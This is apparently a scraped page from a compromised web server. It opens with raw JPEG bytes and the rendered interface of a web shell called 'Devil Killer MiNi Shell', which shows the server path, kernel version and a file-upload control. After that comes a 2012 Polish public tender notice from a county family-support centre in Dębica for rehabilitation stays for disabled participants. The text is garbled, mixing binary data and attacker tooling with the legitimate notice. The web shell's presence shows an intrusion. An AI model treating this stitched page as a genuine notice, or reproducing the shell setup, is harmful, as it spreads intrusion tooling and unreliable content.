JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120717/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120717/256260-N-2012.html

<p class="kh_header"><b>Dębica: ORGANIZACJA I PRZEPROWADZENIE TURNUSÓW REHABILITACYJNYCH DLA UCZESTNIKÓW PROJEKTU SYSTEMOWEGO REALIZOWANEGO PRZEZ POWIATOWE CENTRUM POMOCY RODZINIE W DĘBICY PN.: PROGRAM AKTYWIZACJI SPOŁECZNEJ W POWIECIE DĘBICKIM, WSPÓŁFINANSOWANEGO ZE ŚRODKÓW UNII EUROPEJSKIEJ W RAMACH EUROPEJSKIEGO FUNDUSZU SPOŁECZNEGO PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI, PRIORYTET VII PROMOCJA INTEGRACJI SPOŁECZNEJ, DZIAŁANIE 7.1 ROZWÓJ I UPOWSZECHNIANIE AKTYWNEJ INTEGRACJI, PODDZIAŁANIE 7.1.2 ROZWÓJ I UPOWSZECHNIANIE AKTYWNEJ INTEGRACJI PRZEZ POWIATOWE CENTRA POMOCY RODZINIE.</b><br>
<b>Numer ogłoszenia: 256260 - 2012; data zamieszczenia: 17.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , ul. Parkowa 28, 39-200 Dębica, woj. podkarpackie, tel. 14 680 31 48, faks 14 680 31 21.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiatdebicki.pl/PCPR</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ORGANIZACJA I PRZEPROWADZENIE TURNUSÓW REHABILITACYJNYCH DLA UCZESTNIKÓW PROJEKTU SYSTEMOWEGO REALIZOWANEGO PRZEZ POWIATOWE CENTRUM POMOCY RODZINIE W DĘBICY PN.: PROGRAM AKTYWIZACJI SPOŁECZNEJ W POWIECIE DĘBICKIM, WSPÓŁFINANSOWANEGO ZE ŚRODKÓW UNII EUROPEJSKIEJ W RAMACH EUROPEJSKIEGO FUNDUSZU SPOŁECZNEGO PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI, PRIORYTET VII PROMOCJA INTEGRACJI SPOŁECZNEJ, DZIAŁANIE 7.1 ROZWÓJ I UPOWSZECHNIANIE AKTYWNEJ INTEGRACJI, PODDZIAŁANIE 7.1.2 ROZWÓJ I UPOWSZECHNIANIE AKTYWNEJ INTEGRACJI PRZEZ POWIATOWE CENTRA POMOCY RODZINIE..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja i przeprowadzenie 2 turnusów rehabilitacyjnych dla uczestników projektu systemowego realizowanego przez Powiatowe Centrum Pomocy Rodzinie w Dębicy pn.: Program aktywizacji społecznej w powiecie dębickim, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja Integracji Społecznej, Działanie 7.1 Rozwój i Upowszechnianie Aktywnej Integracji, Poddziałanie 7.1.2 Rozwój i Upowszechnianie Aktywnej Integracji Przez Powiatowe Centra Pomocy Rodzinie.
Szczegółowo opisane w SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9, 85.31.25.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 24.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający za spełnienie niniejszego warunku uzna: 
a)oświadczenie złożone przez Wykonawcę, że posiada uprawnienia do wykonywania wymaganej przez Zamawiającego działalności,
b)kopię aktualnego wpisu do rejestru organizatorów turnusów rehabilitacyjnych,
c)kopię aktualnego wpisu do rejestru ośrodków, w którym mogą odbywać się turnusy rehabilitacyjne dla osób niepełnosprawnych; wpis do rejestru ośrodków powinien zawierać informację o rodzajach realizowanych turnusów rehabilitacyjnych, w tym o turnusie rehabilitacyjnym usprawniająco-rekreacyjnym, w którym będą uczestniczyć osoby 
w szczególności z dysfunkcjami lub schorzeniami opisanymi w szczegółowym opisie przedmiotu zamówienia.
Wpisy do rejestru, o których mowa w lit. b) i c) muszą być wystawione nie wcześniej niż 6 mies. przed upływem terminu składania ofert. 
d)dokument poświadczający iż Wykonawca jest uprawniony do prowadzenia turnusów dla osób niepełnosprawnych poruszających się na wózkach inwalidzkich - wymagane dla części II Zamówienia.
Ocena spełnienia warunków udziału w postępowaniu będzie dokonana przez Zamawiającego metodą zero - jedynkową czyli spełnia - 1 lub nie spełnia - 0</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający za spełnienie niniejszego warunku uzna dołączony do oferty:
a)wykaz wykonanych lub wykonywanych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie tj. realizacji co najmniej trzech turnusów, w tym jeden ze środków dofinansowanych przez Europejski Fundusz Społeczny, o wartości co najmniej 30 000zł brutto każdy, polegających na organizacji i przeprowadzeniu turnusu rehabilitacyjnego usprawniająco - rekreacyjnego dla grupy min. 20 osób, z podaniem: dat wykonania, przedmiotu, odbiorców, źródło finansowania oraz ich wartości, a także złożeniem dokumentów (np.: rekomendacji, zaświadczeń, listów referencyjnych) potwierdzających, że zostały wykonane lub są wykonywane należycie,
b)oświadczenie złożone przez Wykonawcę, że posiada niezbędną wiedzę i doświadczenie w realizacji przedmiotu zamówienia.
Ocena spełnienia warunków udziału w postępowaniu będzie dokonana przez Zamawiającego metodą zero - jedynkową czyli spełnia - 1 lub nie spełnia - 0</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający za spełnienie niniejszego warunku uzna dołączone do oferty: 
a)oświadczenie Wykonawcy, iż osoby, które będą uczestniczyły w wykonaniu zamówienia posiadają wymagane prawem uprawnienia do realizacji przedmiotu zamówienia,
b)wykaz warunków lokalowych i organizacyjno - technicznych obiektu, w którym będzie realizowany przedmiot zamówienia, w tym pozbawionych barier architektonicznych (dotyczy 
w szczególności turnusu II część), z wyszczególnieniem realizowanych przez Wykonawcę zabiegów rehabilitacyjnych i urządzeń rehabilitacyjnych, niezbędnych do wykonywania zabiegów rehabilitacyjnych,
c)wykaz osób, które będą uczestniczyły w wykonaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnego do wykonania przedmiotu zamówienia, a także zakresu wykonywanych przez nie czynności w przedmiocie zamówienia,
d)oświadczenie, iż na czas realizacji zamówienia dysponuje odpowiednimi warunkami techniczno - organizacyjnymi, zgodnymi z wymogami SIWZ.
Ocena spełnienia warunków udziału w postępowaniu będzie dokonana przez Zamawiającego metodą zero - jedynkową czyli spełnia - 1 lub nie spełnia - 0</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający za spełnienie niniejszego warunku uzna dołączone do oferty: 
a)oświadczenie Wykonawcy, iż osoby, które będą uczestniczyły w wykonaniu zamówienia posiadają wymagane prawem uprawnienia do realizacji przedmiotu zamówienia,
b)wykaz osób, które będą uczestniczyły w wykonaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnego do wykonania przedmiotu zamówienia, a także zakresu wykonywanych przez nie czynności w przedmiocie zamówienia,
Ocena spełnienia warunków udziału w postępowaniu będzie dokonana przez Zamawiającego metodą zero - jedynkową czyli spełnia - 1 lub nie spełnia - 0</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający za spełnienie niniejszego warunku uzna dołączone do oferty:
a)oświadczenie Wykonawcy, iż znajduje się w sytuacji ekonomicznej i finansowej zapewniającej prawidłowe wykonanie niniejszego zamówienia,
b)kopię polisy ubezpieczenia OC w zakresie prowadzonej działalności w wysokości nie niższej niż równowartość 100 000zł.
Ocena spełnienia warunków udziału w postępowaniu będzie dokonana przez Zamawiającego metodą zero - jedynkową czyli spełnia - 1 lub nie spełnia - 0</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Rekomendacje bądź referencje, że usługi były wykonane lub są wykonywane należycie</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmiany nieistotne postanowień zawartej umowy, rozumiane w ten sposób, że wiedza o ich wprowadzeniu do umowy na etapie postępowania o udzielenie zamówienia nie wpłynęłaby na krąg podmiotów ubiegających się o to zamówienie czy też na wynik postępowania.
Zamawiający dopuszcza możliwość zmiany postanowień umowy m. in. w zakresie:

1)liczby uczestników turnusu, której Zamawiający nie mógł przewidzieć w chwili zawarcia  umowy, tj.: w przypadku rezygnacji z uczestnictwa w projekcie, w ramach którego udzielane jest zamówienie, choroby bądź zdarzenia losowego.
2)zmiany terminu realizacji części II turnusu w przypadku braku odpowiedniej liczby uczestników.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiatdebicki.pl/PCPR<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> POWIATOWE CENTRUM POMOCY RODZINIE W DĘBICY
ul. Parkowa 28
39-200 DĘBICA
IV piętro, pokój nr 410.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.07.2012 godzina 09:15, miejsce: Powiatowe Centrum Pomocy Rodzinie w Dębicy
ul. Parkowa 28
39 - 200 DĘBICA
IV piętro, pokój nr 410.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiotowe zamówienie jest współfinansowane ze środków PFRON oraz współfinansowane ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja Integracji Społecznej, Działanie 7.1 Rozwój i Upowszechnianie Aktywnej Integracji, Poddziałanie 7.1.2 Rozwój i Upowszechnianie Aktywnej Integracji Przez Powiatowe Centra Pomocy Rodzinie..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> 14 DNIOWY TURNUS REHABILITACYJNY USPRAWNIAJĄCO - REKREACYJNY NAD MORZEM BAŁTYCKIM.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)Turnus kierowany dla następujących grup osób niepełnosprawnych z dysfunkcją i schorzeniami:
a)z dysfunkcją: narządu ruchu, z wyłączeniem osób poruszających się na wózkach inwalidzkich, narządu wzroku, z upośledzeniem umysłowym, z chorobą psychiczną, 
z chorobami neurologicznymi, ze schorzeniami: układu oddechowego, układu krążenia, z padaczką.
b)Turnus obejmuje 13 osób niepełnosprawnych oraz 8 opiekunów osób niepełnosprawnych.  Wykaz osób wraz z rodzajem schorzeń Zamawiający dostarczy Wykonawcy najpóźniej na 3-4 dni przed rozpoczęciem turnusu. 
Zamawiający zastrzega, iż może ulec niewielkiej zmianie liczba uczestników oraz opiekunów turnusu.  
2)Wykonawca będący organizatorem turnusu rehabilitacyjnego zapewni dla każdego uczestnika turnusu: 
a)realizację turnusu rehabilitacyjnego usprawniająco-rekreacyjnego dla osób niepełnosprawnych
b)kadrę gwarantującą prawidłową organizację i realizację programu turnusu (w tym możliwość szybkiej konsultacji psychiatrycznej w razie potrzeby), 
c)badanie lekarskie na początku i na końcu turnusu rehabilitacyjnego, 
d)3 zabiegi rehabilitacyjne wykonywane dziennie dla każdego uczestnika turnusu rehabilitacyjnego według zaleceń lekarza wykonywane w dni powszednie (z wyjątkiem sobót i niedziel), uwzględniające stan zdrowia uczestnika turnusu rehabilitacyjnego. Ilość posiadanego sprzętu musi być adekwatna do ilości wykonywanych zabiegów dla uczestników turnusu, 
e)stałą opiekę pielęgniarską i korzystanie z opieki lekarskiej podczas turnusu i w każdej nagłej sytuacji związanej z pogorszeniem stanu zdrowia uczestnika,      
f)całodzienne wyżywienie składające się z trzech posiłków uwzględniające diety wynikające z posiadanych schorzeń przez uczestników: śniadanie, obiad (dwudaniowy z kompotem) i kolacja z zastrzeżeniem, iż w dniu przyjazdu rozpoczyna się obiadokolacją, a w dniu powrotu Wykonawca zapewni uczestnikom turnusu i ich opiekunom suchy prowiant na czas podróży. Żywienie uczestników turnusu i ich opiekunów powinno odbywać się zgodnie z zasadami racjonalnego żywienia oraz z zachowaniem zasad higieny, 
g)zakwaterowanie wszystkich uczestników turnusu i ich opiekunów w jednej miejscowości i w jednym obiekcie (uczestnicy turnusu powinni być usytuowani w pokojach blisko siebie) w pokojach: 2 - osobowych z pełnym węzłem sanitarnym, tj. wc, umywalka i natrysk w każdym pokoju (z całodobowym dostępem do ciepłej i zimnej wody). Każdy pokój musi być wyposażony w jednoosobowe łóżka z pościelą, ręczniki, papier toaletowy, szafy ubraniowe, krzesła i stoliki, szafki przy łóżkach (wyklucza się łóżka piętrowe), TV, czajnik bezprzewodowy, 
h)opłacenie opłaty uzdrowiskowej/klimatycznej za wszystkich uczestników turnusu 
i opiekunów, jeśli wymagać będzie tego lokalizacja ośrodka, 
i)zorganizowanie wypoczynku dla uczestników turnusu i ich opiekunów, w tym 1 wycieczki krajoznawczej (zwiedzanie atrakcji turystycznych) z licencjowanym przewodnikiem w miejscowości w której odbywa się turnus lub poza miejscowość, w której odbywa się turnus z uwzględnieniem wynajmu środków transportu oraz wszystkich kosztów związanych ze zorganizowaniem wycieczki. Wykonawca w trakcie trwania turnusu zorganizuje  nieodpłatnie 3 imprezy o charakterze integracyjnym i aktywizacyjnym, w tym wieczorek integracyjny orz imprezę podsumowująca turnus, 2 ogniska lub grille z wyżywieniem, tj. pieczenie kiełbasek. 
j)animatora dla uczestników turnusu odpowiedzialnego za koordynację pobytu grupy na turnusie rehabilitacyjnym, 
k)ubezpieczenie NNW dla każdego uczestnika turnusu i opiekuna na turnusie rehabilitacyjnym i wycieczce krajoznawczej  na kwotę 10.000 zł. na każdą osobę. 
Wymagania dotyczące Ośrodka: 
